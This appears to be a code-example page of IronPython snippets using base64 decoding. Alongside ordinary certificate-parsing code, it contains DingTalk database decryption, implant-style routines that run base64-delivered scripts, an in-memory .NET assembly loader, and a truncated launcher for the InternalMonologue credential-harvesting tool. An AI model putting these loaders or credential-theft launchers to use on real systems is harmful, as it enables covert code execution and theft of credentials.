Exemple #1
0
 def check_key(key, src):
     rm = RijndaelManaged()
     rm.Key = Convert.FromBase64String(base64.b64encode(key))
     rm.Mode = CipherMode.ECB
     rm.Padding = PaddingMode.None
     tr = rm.CreateDecryptor()
     data = src.Data
     data.seek(0)
     bts = data.read(16)
     bts = Convert.FromBase64String(base64.b64encode(bts))
     t_r = tr.TransformFinalBlock(bts, 0, 16)
     name = str(bytes(t_r))
     print name
     if name != "SQLite format 3\0":
         return False
     return True
Exemple #2
0
 def aes_decrypt(src, dst, key):
     rm = RijndaelManaged()
     rm.Key = Convert.FromBase64String(base64.b64encode(key))
     rm.Mode = CipherMode.ECB
     rm.Padding = PaddingMode.None
     tr = rm.CreateDecryptor()
     f = open(dst, 'wb')
     data = src.Data
     sz = src.Size
     idx = 0
     while idx < sz:
         bts = data.read(16)
         bts = Convert.FromBase64String(base64.b64encode(bts))
         t_r = tr.TransformFinalBlock(bts, 0, 16)
         f.write(t_r)
         idx += 16
     f.close()
Exemple #3
0
 def run_script(self, data):
     script = Encoding.UTF8.GetString(Convert.FromBase64String(data))
     stream = MuhStream()
     engine = Python.CreateEngine()
     engine.Runtime.IO.SetOutput(stream, Encoding.UTF8)
     engine.Runtime.IO.SetErrorOutput(stream, Encoding.UTF8)
     #scope = engine.CreateScope()
     #scope.SetVariable("client", self)
     engine.Execute(script)
     return stream.string
Exemple #4
0
 def decode_job(self, job):
     buffer = Convert.FromBase64String(job['data'])
     buffer[:2] = Array[Byte](bytearray(b"\x1f\x8b"))
     with MemoryStream(buffer.Length) as compressedStream:
         compressedStream.Write(buffer, 0, buffer.Length)
         compressedStream.Seek(0, SeekOrigin.Begin)
         with GZipStream(compressedStream,
                         CompressionMode.Decompress) as zipStream:
             with MemoryStream() as resultStream:
                 zipStream.CopyTo(resultStream)
                 return JavaScriptSerializer().DeserializeObject(
                     Encoding.UTF8.GetString(resultStream.ToArray()))
Exemple #5
0
def DecodeBase64File(Data, FileName, FilePath="C:\\WINDOWS\\Temp\\"):
    path = "{}{}".format(FilePath, FileName)
    File.WriteAllBytes(path, Convert.FromBase64String(Data))
    return 'File copied to: {}'.format(path)
from System.Reflection import Assembly
from System.Text import Encoding
from System import Array, Object, String, Convert, Console
from System.IO import StreamWriter, MemoryStream

encoded_assembly = "ASSEMBLY_BASE64"

assembly = Assembly.Load(Convert.FromBase64String(encoded_assembly))
args = Array[Object]([Array[String](["ARGS"])])

# For some reason if we don't set the console output back to stdout after executing the assembly IronPython throws a fit
orig_out = Console.Out
orig_error = Console.Error

with MemoryStream() as ms:
    with StreamWriter(ms) as sw:
        Console.SetOut(sw)
        Console.SetError(sw)
        assembly.EntryPoint.Invoke(None, args)
        sw.Flush()
        buffer = ms.ToArray()
        print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
        Console.SetOut(orig_out)
        Console.SetError(orig_error)
    def parse(self):
        def getvalue(tag):
            value = ''
            try:
                value = tag.replace('\n', '').replace('\r', '').replace('\t', '').replace('|', '/') \
                    .replace('"', '').replace('  ', '').replace('NULL', '').replace(';', ',')
            except:
                value = ''
            return value

        def get_oid(name):
            text = ''
            if name == '1.2.643.3.131.1.1':
                text = 'INN'
            elif name == '1.2.643.100.1':
                text = 'OGRN'
            elif name == '1.2.643.100.3':
                text = 'SNILS'
            elif name == '1.2.840.113549.1.9.2':
                text = 'orgRequisites'
            else:
                text = name
            return text

        X509list = []
        X509OIDsList = []
        oid2name = x509.oid._OID_NAMES

        X509Entity = {}
        try:
            data = Convert.FromBase64String(self.__base64)
            temp_cert = X509Certificates.X509Certificate(data)
            cert = x509.load_der_x509_certificate(bytes(temp_cert.GetRawCertData()),
                                                  default_backend())
            data = None
            X509Entity['serial'] = temp_cert.GetSerialNumberString()
            temp_cert = None
            # SubjectInfo

            X509Entity['Subject_SNILS'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'SNILS'])
            X509Entity['Subject_orgRequisites'] = ''.join(
                [getvalue(x.value).replace('-', '/') for x in cert.subject if (
                    oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'orgRequisites'])
            requisites = X509Entity['Subject_orgRequisites'].replace('INN=', '').replace('KPP=', '')\
                .replace('OGRN=', '').replace('ИНН=', '').replace('КПП=', '').replace('ОГРН=', '')\
                .replace('ОГРНИП=', '').replace('OGRNIP', '').replace(' ', '').strip().split('/')
            X509Entity['Subject_INN'] = ''
            try:
                if len(requisites[0]) == 10 or len(requisites[0]) == 12:
                    X509Entity['Subject_INN'] = requisites[0]
            except:
                X509Entity['Subject_INN'] = ''
            if X509Entity['Subject_INN'] == '':
                X509Entity['Subject_INN'] = ''.join([getvalue(x.value) for x in cert.subject if (
                    oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'INN'])
            X509Entity['Subject_KPP'] = ''
            try:
                if len(requisites[1]) == 9:
                    X509Entity['Subject_KPP'] = requisites[1]
            except:
                X509Entity['Subject_KPP'] = ''

            X509Entity['Subject_OGRN'] = ''
            try:
                if len(requisites[2]) == 13 or len(requisites[2]) == 15:
                    X509Entity['Subject_OGRN'] = requisites[2]
            except:
                X509Entity['Subject_OGRN'] = ''
            if X509Entity['Subject_OGRN'] == '':
                X509Entity['Subject_OGRN'] = ''.join([getvalue(x.value) for x in cert.subject if (
                    oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'OGRN'])

            X509Entity['Subject_CommonName'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])
            X509Entity['Subject_Department'] = '; '.join(
                [getvalue(x.value) for x in cert.subject if (
                    oid2name.get(x.oid) or get_oid(
                        x.oid.dotted_string)) == 'organizationalUnitName'])
            X509Entity['Subject_region'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'stateOrProvinceName'])
            X509Entity['Subject_city'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'localityName'])
            X509Entity['Subject_streetAddress'] = ''.join(
                [getvalue(x.value) for x in cert.subject if (
                    oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'streetAddress'])

            X509Entity['Subject_email'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'emailAddress'])
            X509Entity['Subject_User'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'surname'])
            X509Entity['Subject_User'] += ' ' + ''.join([getvalue(x.value) for x in cert.subject if
                                                         (oid2name.get(x.oid) or get_oid(
                                                             x.oid.dotted_string)) == 'givenName'])
            X509Entity['Subject_UserPost'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'title'])

            X509Entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
            # X509Entity['serial'] = str(hex(cert.serial_number))
            X509Entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
            X509Entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')

            # IssuerInfo
            X509Entity['Issuer_CN'] = ''.join([getvalue(x.value) for x in cert.issuer if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])

            X509Entity['sign'] = self.__base64
            try:
                for x in cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE).value:
                    X509OID = {}
                    X509OID['Thumb'] = X509Entity['Thumb']
                    X509OID['oid'] = x.dotted_string
                    X509OID['value'] = ''
                    X509OID['type'] = 'extensions'
                    X509OIDsList.append(X509OID)
            except:
                pass

            for x in cert.subject.rdns:
                for i in x:
                    X509OID = {}
                    X509OID['Thumb'] = X509Entity['Thumb']
                    X509OID['oid'] = i.oid.dotted_string
                    X509OID['value'] = (getvalue(i.value) or '')
                    X509OID['type'] = 'subject'
                    X509OIDsList.append(X509OID)

            for x in cert.issuer.rdns:
                for i in x:
                    X509OID = {}
                    X509OID['Thumb'] = X509Entity['Thumb']
                    X509OID['oid'] = i.oid.dotted_string
                    X509OID['value'] = (getvalue(i.value) or '')
                    X509OID['type'] = 'issuer'
                    X509OIDsList.append(X509OID)

            X509list.append(X509Entity)
            print(X509Entity['Thumb'])

        except Exception as e:
            print('error sign!')
            pass

        return X509list, X509OIDsList
Exemple #8
0
 def search_account(self):
     pre_node = self.root.GetByPath(
         'Library/Preferences/com.laiwang.DingTalk.plist')
     if pre_node is None:
         self.log_print('''Can't find preferences node, parse exits!''')
         return
     bp = BPReader(pre_node.Data).top
     # pass...
     #device_id = bp['UTDID']['UTDID'].Value
     b = bp['UTDID']
     if b is None:
         self.log_print("EXCEPTION OF NONE DATA!")
         return
     device_id = bp['UTDID']['UTDID'].Value
     abs_path = self.root.PathWithMountPoint
     sql_dir = os.path.join(abs_path, 'Documents/db')
     k = os.listdir(sql_dir)
     scops = list()
     for i in k:
         res = self.check_is_md5(i)
         if res:
             res = os.path.exists(
                 os.path.join(sql_dir, '{}/db.sqlite'.format(i)))
             if res:
                 scops.append(i)
     #self.log_print('''total find %d accounts''' % len(scops))
     if self.is_scripts:
         cache = ds.OpenCachePath('Dingtalk')
     else:
         cache = "D:/cache"
     for i in scops:
         r = device_id + i
         hash_code = hashlib.md5(r).hexdigest()
         key = hash_code[8:24]
         dest_sql = os.path.join(cache, '{}.sqlite'.format(i))
         dest_sql_fts = os.path.join(cache, '{}.sqlite_fts'.format(i))
         f_dest = open(dest_sql, 'wb')
         f_dest_fts = open(dest_sql_fts, 'wb')
         source_node = self.root.GetByPath(
             'Documents/db/{}/db.sqlite'.format(i))
         source_node_fts = self.root.GetByPath(
             'Documents/db/{}/db.sqlite_fts'.format(i))
         if source_node is None:
             continue
         data = source_node.Data
         sz = source_node.Size
         idx = 0
         print(key)
         rm = RijndaelManaged()
         rm.Key = Convert.FromBase64String(base64.b64encode(key))
         rm.Mode = CipherMode.ECB
         rm.Padding = PaddingMode.None
         tr = rm.CreateDecryptor()
         while idx < sz:
             # if canceller.IsCancellationRequested:
             #     f_dest.close()
             #     os.remove(dest_sql)
             #     raise IOError('f****d')
             bts = data.read(16)
             bts = Convert.FromBase64String(base64.b64encode(bts))
             t_r = tr.TransformFinalBlock(bts, 0, 16)
             f_dest.write(t_r)
             idx += 16
         f_dest.close()
         self.result_sql.append(dest_sql)
         # for further using...
         if source_node_fts is None:
             continue
         sz = source_node_fts.Size
         data = source_node_fts.Data
         idx = 0
         while idx < sz:
             # if canceller.IsCancellationRequested:
             #     f_dest_fts.close()
             #     os.remove(dest_sql_fts)
             #     raise IOError('f****d')
             bts = data.read(16)
             bts = Convert.FromBase64String(base64.b64encode(bts))
             t_r = tr.TransformFinalBlock(bts, 0, 16)
             f_dest_fts.write(t_r)
             idx += 16
def parse(**kwargs):
    # Объявляем списки для хранения словарей и пространство OID-имён
    X509list = []
    X509OIDsList = []
    oid2name = x509.oid._OID_NAMES

    # Объявляем словарь-контейнер для хранения данных сертификата
    X509Entity = {}

    try:
        # Читаем файл и загружаем в массив байтов
        data = Convert.FromBase64String(kwargs['sign'])
        data = X509Certificates.X509Certificate(data)
        X509Entity['serial'] = data.GetSerialNumberString()
        X509Entity['sign'] = kwargs['sign']
        cert = x509.load_der_x509_certificate(bytes(data.GetRawCertData()), default_backend())
        data = None

        # SubjectInfo

        X509Entity['Subject_SNILS'] = ''.join(
            [getvalue(x.value) for x in cert.subject if
             (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'SNILS'])
        X509Entity['Subject_orgRequisites'] = ''.join([getvalue(x.value).replace('-', '/') for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'orgRequisites'])
        requisites = X509Entity['Subject_orgRequisites'].replace('INN=', '') \
            .replace('KPP=', '').replace('OGRN=', '').replace('ИНН=', '').replace('КПП=', '') \
            .replace('ОГРН=', '').replace('ОГРНИП=', '').replace('OGRNIP', '') \
            .replace(' ', '').strip().split('/')
        X509Entity['Subject_INN'] = ''
        try:
            if len(requisites[0]) == 10 or len(requisites[0]) == 12:
                X509Entity['Subject_INN'] = requisites[0]
        except Exception as exc:
            X509Entity['Subject_INN'] = ''

        if X509Entity['Subject_INN'] == '':
            X509Entity['Subject_INN'] = ''.join(
                [getvalue(x.value) for x in cert.subject if
                 (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'INN'])

        X509Entity['Subject_KPP'] = ''
        try:
            if len(requisites[1]) == 9:
                X509Entity['Subject_KPP'] = requisites[1]
        except Exception as exc:
            X509Entity['Subject_KPP'] = ''

        X509Entity['Subject_OGRN'] = ''
        try:
            if len(requisites[2]) == 13 or len(requisites[2]) == 15:
                X509Entity['Subject_OGRN'] = requisites[2]
        except Exception as exc:
            X509Entity['Subject_OGRN'] = ''

        if X509Entity['Subject_OGRN'] == '':
            X509Entity['Subject_OGRN'] = ''.join([getvalue(x.value) for x in cert.subject if
                                                  (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'OGRN'])

        X509Entity['Subject_CommonName'] = ''.join([getvalue(x.value) for x in cert.subject if
                                                    (oid2name.get(x.oid) or get_oid(
                                                        x.oid.dotted_string)) == 'commonName'])

        department = []
        for x in cert.subject:
            if (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'organizationalUnitName':
                if getvalue(x.value) not in department:
                    department.append(getvalue(x.value))
        X509Entity['Subject_Department'] = '; '.join(department)

        X509Entity['Subject_region'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'stateOrProvinceName'])
        X509Entity['Subject_city'] = ''.join([getvalue(x.value) for x in cert.subject if
                                              (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'localityName'])
        X509Entity['Subject_streetAddress'] = ''.join([getvalue(x.value) for x in cert.subject if (
                oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'streetAddress'])

        X509Entity['Subject_email'] = ''.join([getvalue(x.value) for x in cert.subject if
                                               (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'emailAddress'])
        X509Entity['Subject_User'] = ''.join(
            [getvalue(x.value) for x in cert.subject if
             (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'surname'])
        X509Entity['Subject_User'] += ' ' + ''.join([getvalue(x.value) for x in cert.subject if
                                                     (oid2name.get(x.oid) or get_oid(
                                                         x.oid.dotted_string)) == 'givenName'])
        X509Entity['Subject_UserPost'] = ''.join(
            [getvalue(x.value) for x in cert.subject if
             (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'title'])

        X509Entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
        X509Entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
        X509Entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')

        # IssuerInfo
        X509Entity['Issuer_CN'] = ''.join([getvalue(x.value) for x in cert.issuer if
                                           (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])



        try:
            for x in cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE).value:
                X509OID = {}
                X509OID['Thumb'] = X509Entity['Thumb']
                X509OID['oid'] = x.dotted_string
                X509OID['value'] = ''
                X509OID['type'] = 'extensions'
                X509OIDsList.append(X509OID)
        except Exception as exc:
            pass

        for x in cert.subject.rdns:
            for i in x:
                X509OID = {}
                X509OID['Thumb'] = X509Entity['Thumb']
                X509OID['oid'] = i.oid.dotted_string
                X509OID['value'] = (getvalue(i.value) or '')
                X509OID['type'] = 'subject'
                X509OIDsList.append(X509OID)

        for x in cert.issuer.rdns:
            for i in x:
                X509OID = {}
                X509OID['Thumb'] = X509Entity['Thumb']
                X509OID['oid'] = i.oid.dotted_string
                X509OID['value'] = (getvalue(i.value) or '')
                X509OID['type'] = 'issuer'
                X509OIDsList.append(X509OID)

        X509list.append(X509Entity)
        print(X509Entity['Thumb'])
    except Exception as exc:
        pass

    if len(X509list) > 0:
        kwargs['mutex'].acquire()
        kwargs['certificates'].extend(X509list)
        kwargs['oids'].extend(X509OIDsList)
        kwargs['mutex'].release()
Exemple #10
0
 def set_plot(self, fig):
     base64string = base64_fig(fig)
     imagebytes = Convert.FromBase64String(base64string)
     image = stream_bitmap(imagebytes)
     self.PlotImage.Source = image
Exemple #11
0
    with MemoryStream(compressed.Length) as inputStream:
        inputStream.Write(compressed, 0, compressed.Length)
        inputStream.Seek(0, SeekOrigin.Begin)
        with MemoryStream() as outputStream:
            with DeflateStream(inputStream, CompressionMode.Decompress) as deflateStream:
                buffer = Array.CreateInstance(Byte, 4096)
                bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
                outputStream.Write(buffer, 0, bytesRead)
                while bytesRead != 0:
                    bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
                    outputStream.Write(buffer, 0, bytesRead)

                return outputStream.ToArray()


assembly = Assembly.Load(Decompress(Convert.FromBase64String(InternalMonologueDLL)))
clr.AddReference(assembly)
from InternalMonologue.Class1 import Main

orig_out = Console.Out
orig_error = Console.Error

with MemoryStream() as ms:
    with StreamWriter(ms) as sw:
        Console.SetOut(sw)
        Console.SetError(sw)
        Main(impersonate=,
             threads=,
             downgrade=,
             restore=,
             challenge=,